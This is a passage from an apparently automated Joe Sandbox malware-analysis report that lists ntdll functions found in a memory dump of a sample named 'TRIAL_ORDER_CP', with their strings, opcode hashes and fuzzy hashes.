                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                          • API String ID: 0-1145731471
                                          • Opcode ID: 1903fdc085ce0cb6ee811efdfc64ce749987545638dcfcb9f186c9271b3dbd06
                                          • Instruction ID: df6102a1f650bdbd81e012a792b97a947252e8abbb4fa041887a4bbbd2f1e18e
                                          • Opcode Fuzzy Hash: 1903fdc085ce0cb6ee811efdfc64ce749987545638dcfcb9f186c9271b3dbd06
                                          • Instruction Fuzzy Hash: 95B1B976E187158BDB24CF69C890B9DB3B5EF44790F284439E965EB780D730E840CB60
                                          Function 33B9330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                          • API String ID: 0-2391371766
                                          • Opcode ID: 64ee50aa7056cc82acf1631fcd35d3386c38804484b3e31ba4d5c32c600a7297
                                          • Instruction ID: 40b1e1de06d84563bd49b0b05554f7ac1e5abe5b7d9ebf062a89f0434b3cd6fa
                                          • Opcode Fuzzy Hash: 64ee50aa7056cc82acf1631fcd35d3386c38804484b3e31ba4d5c32c600a7297
                                          • Instruction Fuzzy Hash: EAB19D71A08351AFF711DF54C880F9BB7E8EB48754F450939FA989B650DB70EC448BA2
                                          Function 33B0A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: de91ac9b3b1946f804631cdaec3cac4056f5d469335fe2bb66253f290c3965e8
                                          • Instruction ID: 4259708bccf7f117623ec8e3cc89dbb1af9bc552c2fd21e75b910b0e0a2d654d
                                          • Opcode Fuzzy Hash: de91ac9b3b1946f804631cdaec3cac4056f5d469335fe2bb66253f290c3965e8
                                          • Instruction Fuzzy Hash: 30A16A75D016299BEB21DF64CC88B9AB7B8EF08714F1005FAE908E7251EB359E84CF50
                                          Function 33BA327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                          • API String ID: 0-318774311
                                          • Opcode ID: 11e7743cf5c49dbabb41c457abd3d37bafcef178bc6ef2928f241efa1be1e602
                                          • Instruction ID: e324bd33f8b0a8462fbe3a54579364135b99758ab0ede5d2bb15be652eefc60c
                                          • Opcode Fuzzy Hash: 11e7743cf5c49dbabb41c457abd3d37bafcef178bc6ef2928f241efa1be1e602
                                          • Instruction Fuzzy Hash: 42817A7160C750AFE711CB28C880F6ABBE8EF85750F480979FD88DB290DB74D9048B62
                                          Function 33B1B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                          • API String ID: 0-373624363
                                          • Opcode ID: f3e20cd8cd96047a3b2815566d32d82b54e718b253446fc8be8f1c94cee2f640
                                          • Instruction ID: 4185def68319c43d6db0908f7a188d698c9d6336d000390ef1c444e1194d28b2
                                          • Opcode Fuzzy Hash: f3e20cd8cd96047a3b2815566d32d82b54e718b253446fc8be8f1c94cee2f640
                                          • Instruction Fuzzy Hash: A091CE75E04369CFEB11CF54D450B9EB7B0FF053A4F2881A9E854AB290D778DA90CBA0
                                          Function 33BEB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                          Download Yara Rule
                                          Strings
                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 33BEB3AA
                                          • TargetNtPath, xrefs: 33BEB3AF
                                          • GlobalizationUserSettings, xrefs: 33BEB3B4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                          • API String ID: 0-505981995
                                          • Opcode ID: 5c41ed2d11d19167c9f8779e662d0c006248bc75c4ce21fa48654c8fd750223f
                                          • Instruction ID: dc18baf0fe242754d288988a245f78d556b0429c47212aa85d4e0d75ad7427fa
                                          • Opcode Fuzzy Hash: 5c41ed2d11d19167c9f8779e662d0c006248bc75c4ce21fa48654c8fd750223f
                                          • Instruction Fuzzy Hash: DD615E72D46229ABDB21DF58EC98F9AB7B8EB04711F4101F9E508A7250DB74DE84CF90
                                          Function 33B0F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 33B6E455
                                          • HEAP[%wZ]: , xrefs: 33B6E435
                                          • HEAP: , xrefs: 33B6E442
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: cf67a399b48c397f7ffff44c5666adf6bcc129f27ff791eb6d0d1da0dca2b11c
                                          • Instruction ID: 696a1343fcd6174f59840e0d54021eb09742f3ad657627426305706e2be25422
                                          • Opcode Fuzzy Hash: cf67a399b48c397f7ffff44c5666adf6bcc129f27ff791eb6d0d1da0dca2b11c
                                          • Instruction Fuzzy Hash: 1A51C035A00794EFE312CBA8C984F9ABBE8FF04644F0441B5E5948B662D774EA14CB60
                                          Function 33B31514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                          Download Yara Rule
                                          Strings
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 33B7A396
                                          • LdrpCompleteMapModule, xrefs: 33B7A39D
                                          • minkernel\ntdll\ldrmap.c, xrefs: 33B7A3A7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 9bef26e82e5aae70184d849eba7aecd536fac174c802c5ac626ab91af1222d9d
                                          • Instruction ID: 88fce8e5d4b639d1249ac3ef79383840338787f6d79981eba4d73db1f6004356
                                          • Opcode Fuzzy Hash: 9bef26e82e5aae70184d849eba7aecd536fac174c802c5ac626ab91af1222d9d
                                          • Instruction Fuzzy Hash: AC513478A01761DBE711DF58C940B0A77E8FF41764F1602B9E8619B7D1DB31E900CB50
                                          Function 33BBD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                          Download Yara Rule
                                          Strings
                                          • HEAP[%wZ]: , xrefs: 33BBD792
                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 33BBD7B2
                                          • HEAP: , xrefs: 33BBD79F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                          • API String ID: 0-3815128232
                                          • Opcode ID: b69fc0dc17a8fff56da5b2f118f22dbc95802f8081be31759583186057eb565b
                                          • Instruction ID: 3307c007b7dfcb98ecbf5fdbc0bb40f48843b4e88a49246a2765dfa43941f6c8
                                          • Opcode Fuzzy Hash: b69fc0dc17a8fff56da5b2f118f22dbc95802f8081be31759583186057eb565b
                                          • Instruction Fuzzy Hash: 505103791007608FEB50DF2AC8407B277F1EB452C8F9548AEE4D68B581EE2ED847DB60
                                          Function 33B0753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                          • API String ID: 0-1151232445
                                          • Opcode ID: 27429b362e7c5b7a37feb90de730470aeb26304221c9a501e84d983c51e70276
                                          • Instruction ID: 50967ca1cb1db98ae3d91bf04ee204da03e5293c561babee55549104e4d414a4
                                          • Opcode Fuzzy Hash: 27429b362e7c5b7a37feb90de730470aeb26304221c9a501e84d983c51e70276
                                          • Instruction Fuzzy Hash: E941E5B8700750CFEF15CA1CC495BA9BF94EB02249F6844B9E4868B953CB75D886CF21
                                          Function 33B415EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 33B81954
                                          • LdrpAllocateTls, xrefs: 33B8194A
                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33B81943
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-4274184382
                                          • Opcode ID: 2391aa4d1ed8a61ff84298e999aaf9ea272b17b850e392d6401bba3d1af2a473
                                          • Instruction ID: bc65a508cf766700394eedf79f325bf8c51d02ea4c0472aa554773ce5cf2cd6c
                                          • Opcode Fuzzy Hash: 2391aa4d1ed8a61ff84298e999aaf9ea272b17b850e392d6401bba3d1af2a473
                                          • Instruction Fuzzy Hash: 934176B5E01344AFDB04CFA9C881EAEBBF5FF48300F04852AE405AB651DB39A801CF90
                                          Function 33B432C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                          Download Yara Rule
                                          Strings
                                          • Actx , xrefs: 33B432CC
                                          • RtlCreateActivationContext, xrefs: 33B82803
                                          • SXS: %s() passed the empty activation context data, xrefs: 33B82808
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                          • API String ID: 0-859632880
                                          • Opcode ID: a0fa0d3fc4f33769fe9a0be9c9ad40fd31bcdf7f77887f28e2679f3749cd130c
                                          • Instruction ID: ef6cf50a7e2187bf92d853eb89105f15f59c47d6d74a42b43bb42e9bdffea8be
                                          • Opcode Fuzzy Hash: a0fa0d3fc4f33769fe9a0be9c9ad40fd31bcdf7f77887f28e2679f3749cd130c
                                          • Instruction Fuzzy Hash: 4F311E72A003569FEF01CE28D880F9A37A4EF44750F994879EC089F282DB70D916CBA0
                                          Function 33B9B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 33B9B2F0
                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 33B9B2B2
                                          • GlobalFlag, xrefs: 33B9B30F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                          • API String ID: 0-4192008846
                                          • Opcode ID: bf8dffe372896561147e79f7f2f3cee69e140994d5e452b47d5179c4160c4cd9
                                          • Instruction ID: ea63984835cf76f4e127ba2996ea3abd29e7ac34fe142380980d238e6dbc755a
                                          • Opcode Fuzzy Hash: bf8dffe372896561147e79f7f2f3cee69e140994d5e452b47d5179c4160c4cd9
                                          • Instruction Fuzzy Hash: D1312AB5E01219AEEB10DFA4DC80EEEBBBCEB48744F444479E605EB141D7749B048B90
                                          Function 33B41527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 33B8185B
                                          • LdrpInitializeTls, xrefs: 33B81851
                                          • DLL "%wZ" has TLS information at %p, xrefs: 33B8184A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-931879808
                                          • Opcode ID: 524c0f208dca9288641027b5fb1fc38897cbe0f61d55a20fb6e1fe4f508b522b
                                          • Instruction ID: e1bf3c113c96f17db7e7efe4d43640825b5bf7d893fbfcc91cbb40418fac6a3b
                                          • Opcode Fuzzy Hash: 524c0f208dca9288641027b5fb1fc38897cbe0f61d55a20fb6e1fe4f508b522b
                                          • Instruction Fuzzy Hash: 63313AB1E10390AFE7109B4ACD45FAA77ACFB44384F01003AE402B7281DB70ED459BA4
                                          Function 33B51190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 33B511C5
                                          • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 33B5119B
                                          • BuildLabEx, xrefs: 33B5122F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 0-3051831665
                                          • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                          • Instruction ID: d04182a878a4c9038160b488173eff150fabae6c82a708e960bce8e6ebac5723
                                          • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                          • Instruction Fuzzy Hash: CB314B76D01719BBEF118B94CC44EEEBBB9EB84650F004136F514EB2A0EB31DA459BA0
                                          Function 33B985AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 33B985DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          • Opcode ID: 63099dc32220401fe10c4df1d6c5c12ea793e2200fffaf3d71562987e427a06b
                                          • Instruction ID: 4f592723b00f6cf2ea48db99ffe0cccdd20be325b68cdeb4666626f2acd340dc
                                          • Opcode Fuzzy Hash: 63099dc32220401fe10c4df1d6c5c12ea793e2200fffaf3d71562987e427a06b
                                          • Instruction Fuzzy Hash: 3D017B76A083586FF6215E10C848EC67B65FF04395F440478E501DF863CB20FC81CE94
                                          Function 33B251C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@
                                          • API String ID: 0-149943524
                                          • Opcode ID: 0d911e4a6ba86e3c0f27ccdbfac49530843414953848625870e566896ecf44fd
                                          • Instruction ID: bc255809ae1f491a4f13b315ba805dca7474ef78d41ce72b9135e159435d735c
                                          • Opcode Fuzzy Hash: 0d911e4a6ba86e3c0f27ccdbfac49530843414953848625870e566896ecf44fd
                                          • Instruction Fuzzy Hash: CD328AB45083218FD7248F14C480B2AFBE5EF88744F584A3EF999DB690E774D984CB92
                                          Function 33B15622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 0403cff7a2bca90c2ea7ad6659dd5c2de20d45362720e4e511d8a1093add3ffc
                                          • Instruction ID: 2bc33ba1a0977d8729c4c1964488a5aac36754e845b94a76545e78457954c91a
                                          • Opcode Fuzzy Hash: 0403cff7a2bca90c2ea7ad6659dd5c2de20d45362720e4e511d8a1093add3ffc
                                          • Instruction Fuzzy Hash: B0318931A11B12AFE7559B64CA90F8AFBA9FF44694F044136E95087F50EB74E831CBD0
                                          Function 33B8E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: e08a07c92acd7b0ae09222808065dacf077c46924d87d5fb136863580b49244a
                                          • Instruction ID: f03777694b5ab24dcd1ddee468842ade30f90b7222a8f56d0853956ba0ef6e65
                                          • Opcode Fuzzy Hash: e08a07c92acd7b0ae09222808065dacf077c46924d87d5fb136863580b49244a
                                          • Instruction Fuzzy Hash: 10616CB1E053599FEB15CFA8C840BADB7B8FB44740F54403AE549EB661EB31D900CB61
                                          Function 33B2F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$$
                                          • API String ID: 3446177414-233714265
                                          • Opcode ID: daf257a4d4e6df563e52a340a676f1862c3b63fb03c939ae7511cd7dccfa8ed0
                                          • Instruction ID: 40c9a9ff004888d39b3ff9fc67c9dc928f4242a2b440679bfc71256c4400b4f4
                                          • Opcode Fuzzy Hash: daf257a4d4e6df563e52a340a676f1862c3b63fb03c939ae7511cd7dccfa8ed0
                                          • Instruction Fuzzy Hash: 8361AAB5E01B89CFEB20CFA4C684F99BBB1FF04304F144679D519ABA91CB74A941CB90
                                          Function 33B1A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 33B1A229
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 33B1A21B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          • Opcode ID: 4bc1eb5279c9a280d2cd03e81f10a5221da81d2504da746d48566d80270b2169
                                          • Instruction ID: 27c91ca6e8ab8c7c7e70dd935e9bfb9701d6b25b53091edfc764652f77a74740
                                          • Opcode Fuzzy Hash: 4bc1eb5279c9a280d2cd03e81f10a5221da81d2504da746d48566d80270b2169
                                          • Instruction Fuzzy Hash: 8D41BCB5E00755DFEB01CF99C440B59B7B4EF85750F1840B5E894DB2A4E636E920CB50
                                          Function 33BA314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                          • API String ID: 0-118005554
                                          • Opcode ID: 76ef4fe00f930195bdda8b6f1a14bce5fc3f8576c6b3fe4125957f3726e4fdb4
                                          • Instruction ID: bb8a194b5c05cbce75fad439b4946c0f5663268bc14220051fe1b836312a341e
                                          • Opcode Fuzzy Hash: 76ef4fe00f930195bdda8b6f1a14bce5fc3f8576c6b3fe4125957f3726e4fdb4
                                          • Instruction Fuzzy Hash: 6231AD7560CB919BE301CB69D880B1AB7E4EF85754F080979FD58CB390EB35D905CB62
                                          Function 33B431BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
